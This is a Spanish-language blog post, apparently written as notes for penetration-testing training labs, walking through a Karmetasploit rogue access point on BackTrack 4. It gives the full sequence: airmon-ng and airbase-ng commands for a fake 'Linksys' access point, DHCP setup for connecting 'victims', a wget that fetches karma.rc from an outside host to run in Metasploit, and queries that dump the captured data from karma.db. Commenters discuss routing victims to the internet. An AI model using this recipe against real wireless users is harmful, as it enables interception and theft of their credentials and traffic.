jueves, 5 de noviembre de 2009

Karmetasploit en BackTrack 4

Actualizando algunos labs del COMBAT training para BackTrack 4, aquí les dejo algunas notas para jugar con Karmetasploit.



- Ponemos la placa en modo monitor:

airmon-ng start wlan0


- Levantamos el Access Point falso en la interfaz en modo
monitor:

airbase-ng -P -C 30 -e “Linksys” -v mon0


- Configuramos el rango de IPs que entregara el servidor
DHCP:

nano /etc/dhcp3/dhcpd.conf

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.140 10.0.0.240;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}


- Configuramos la IP en la interfaz que creo airbase-ng:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0


- Levantamos el DHCP que le entregara las IPs a las
victimas que se conecten al Access Point falso:

/etc/init.d/dhcp3-server start


- Vemos las IPs que entrega el DHCP:

tail -f /var/log/messages


- Bajamos el script de Karma y corremos Metasploit:

cd /pentest/exploits/framework3

wget http://digitaloffense.net/tools/karma.rc

./msfconsole -r karma.rc


- Podemos obtener los datos guardados en karma.db
de esta forma:

sqlite3 karma.db
.tables
select * from notes;
.quit

3 comentarios:

sch3m4 dijo...

podrías aprovechar y dar acceso a internet a los "usuarios" con un servidor dns y una regla en las iptables. Hace tiempo hice un script para crear puntos de acceso y dar conexión a los "usuarios": http://opensec.es/2009/10/05/creando-un-punto-de-acceso-falso-ii/

PD: buen blog ;)

Leonardo Pigñer dijo...

Hola sch3ma!

Muy interesante el script que hiciste, sin dudas voy a estar jugando con eso este fin de semana ;)

Saludos!
leo

Esteban Lopez dijo...

La verda lo he intentado de todas las formas, con dnsmasq y con dhcp3-server, y no logro que el servidor le asigne direccion al cliente :(

LinkWithin